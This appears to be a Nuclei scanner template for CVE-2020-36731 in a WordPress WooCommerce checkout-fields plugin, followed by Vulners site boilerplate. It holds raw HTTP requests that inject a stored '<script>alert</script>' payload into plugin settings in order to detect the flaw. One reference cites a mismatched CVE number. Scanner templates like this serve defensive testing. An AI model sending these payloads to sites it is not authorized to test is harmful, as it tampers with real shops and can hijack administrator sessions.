id: CVE-2020-36731
info:
name: Flexible Checkout Fields for WooCommerce <= 2.3.1 - Unauthenticated Arbitrary Plugin Settings Update
author: popcorn94
severity: high
description: |
The Flexible Checkout Fields for WooCommerce plugin for WordPress is vulnerable to Unauthenticated Arbitrary Plugin Settings update, in addition to Stored Cross-Site Scripting in versions up to, and including, 2.3.1. This is due to missing authorization checks on the updateSettingsAction() function which is called via an admin_init hook, along with missing sanitization and escaping on the settings that are stored.
impact: |
Unauthenticated attackers can arbitrarily update plugin settings and inject stored XSS payloads, potentially taking over the WordPress site or stealing administrator credentials.
remediation: Fixed in 2.3.2.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2024-11972
- https://www.wordfence.com/blog/2020/02/site-takeover-campaign-exploits-multiple-zero-day-vulnerabilities/
- https://www.wordfence.com/threat-intel/vulnerabilities/id/fd12a952-2e99-41f7-b74c-55c2b7d8deed?source=cve
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score: 7.2
cve-id: CVE-2020-36731
cwe-id: CWE-79
epss-score: 0.01342
epss-percentile: 0.67886
cpe: cpe:2.3:a:wpdesk:flexible_checkout_fields_for_woocommerce:*:*:*:*:*:wordpress:*:*
metadata:
vendor: wpdesk
product: flexible_checkout_fields_for_woocommerce
framework: wordpress
fofa-query: body="/wp-content/plugins/flexible-checkout-fields/"
publicwww-query: "/wp-content/plugins/flexible-checkout-fields/"
tags: cve,cve2020,wordpress,wp-plugin,wp,flexible-checkout-fields,xss,vkev,vuln
flow: http(1) && http(2) && http(3)
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- raw:
- |
POST /wp-admin/admin.php?page=inspire_checkout_fields_settings&tab=fields_order HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
option_page=inspire_checkout_fields_settings&action=update&inspire_checkout_fields%5Bsettings%5D%5Border%5D=&inspire_checkout_fields%5Bsettings%5D%5Border%5D%5Border_comments%5D%5Bname%5D=order_comments&inspire_checkout_fields%5Bsettings%5D%5Border%5D%5Border_comments%5D%5Bvisible%5D=1&inspire_checkout_fields%5Bsettings%5D%5Border%5D%5Border_comments%5D%5Bvisible%5D=0&inspire_checkout_fields%5Bsettings%5D%5Border%5D%5Border_comments%5D%5Brequired%5D=0&inspire_checkout_fields%5Bsettings%5D%5Border%5D%5Border_comments%5D%5Blabel%5D=Order+Notes&inspire_checkout_fields%5Bsettings%5D%5Border%5D%5Border_comments%5D%5Bplaceholder%5D=Notes+about+your+order%2C+e.g.+special+notes+for+delivery.&inspire_checkout_fields%5Bsettings%5D%5Border%5D%5Border_comments%5D%5Bclass%5D=&inspire_checkout_fields%5Bsettings%5D%5Border%5D%5Border_<script>alert(document.domain)</script>_%5D%5Bcustom_field%5D=1
matchers:
- type: word
words:
- "order_<script>alert(document.domain)</script>"
- "[custom_field]"
- "inspire_checkout_fields[settings][order]"
condition: and
internal: true
- raw:
- |
POST /wp-admin/admin.php?page=inspire_checkout_fields_settings&tab=fields_order HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
option_page=inspire_checkout_fields_settings&action=update&inspire_checkout_fields%5Bsettings%5D%5Border%5D=&inspire_checkout_fields%5Bsettings%5D%5Border%5D%5Border_comments%5D%5Bname%5D=order_comments&inspire_checkout_fields%5Bsettings%5D%5Border%5D%5Border_comments%5D%5Bvisible%5D=1&inspire_checkout_fields%5Bsettings%5D%5Border%5D%5Border_comments%5D%5Bvisible%5D=0&inspire_checkout_fields%5Bsettings%5D%5Border%5D%5Border_comments%5D%5Brequired%5D=0&inspire_checkout_fields%5Bsettings%5D%5Border%5D%5Border_comments%5D%5Blabel%5D=Order+Notes&inspire_checkout_fields%5Bsettings%5D%5Border%5D%5Border_comments%5D%5Bplaceholder%5D=Notes+about+your+order%2C+e.g.+special+notes+for+delivery.&inspire_checkout_fields%5Bsettings%5D%5Border%5D%5Border_comments%5D%5Bclass%5D=&inspire_checkout_fields%5Bsettings%5D%5Border%5D%5Border_%3Cscript%3Ealert%282%29%3C%2Fscript%3E_%5D%5Bcustom_field%5D=1&inspire_checkout_fields%5Bsettings%5D%5Border%5D%5Border_%3Cscript%3Ealert%282%29%3C%2Fscript%3E_%5D%5Bname%5D=order_%3Cscript%3Ealert%282%29%3C%2Fscript%3E_&inspire_checkout_fields%5Bsettings%5D%5Border%5D%5Border_%3Cscript%3Ealert%282%29%3C%2Fscript%3E_%5D%5Bvisible%5D=1&inspire_checkout_fields%5Bsettings%5D%5Border%5D%5Border_%3Cscript%3Ealert%282%29%3C%2Fscript%3E_%5D%5Bvisible%5D=0&inspire_checkout_fields%5Bsettings%5D%5Border%5D%5Border_%3Cscript%3Ealert%282%29%3C%2Fscript%3E_%5D%5Brequired%5D=0&inspire_checkout_fields%5Bsettings%5D%5Border%5D%5Border_%3Cscript%3Ealert%282%29%3C%2Fscript%3E_%5D%5Blabel%5D=&inspire_checkout_fields%5Bsettings%5D%5Border%5D%5Border_%3Cscript%3Ealert%282%29%3C%2Fscript%3E_%5D%5Boption%5D=&inspire_checkout_fields%5Bsettings%5D%5Border%5D%5Border_%3Cscript%3Ealert%282%29%3C%2Fscript%3E_%5D%5Btype%5D=text&inspire_checkout_fields%5Bsettings%5D%5Border%5D%5Border_%3Cscript%3Ealert%282%29%3C%2Fscript%3E_%5D%5Bplaceholder%5D=&inspire_checkout_fields%5Bsettings%5D%5Border%5D%5Border_%3Cscript%3Ealert%282%29%3C%2Fscript%3E_%5D%5Bclass%5D=&reset_settings=Reset+Section+Settings
matchers:
- type: word
words:
- "Settings resetted."
# digest: 4b0a004830460221009ec766eea9e8d657c47ddbe31f72476c2e495fde85528643a404c3dabe68f99a022100af3a4ec129cdbabe93af803f79d87bcc7cadde188cee05ea38e30aa5a702481b:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation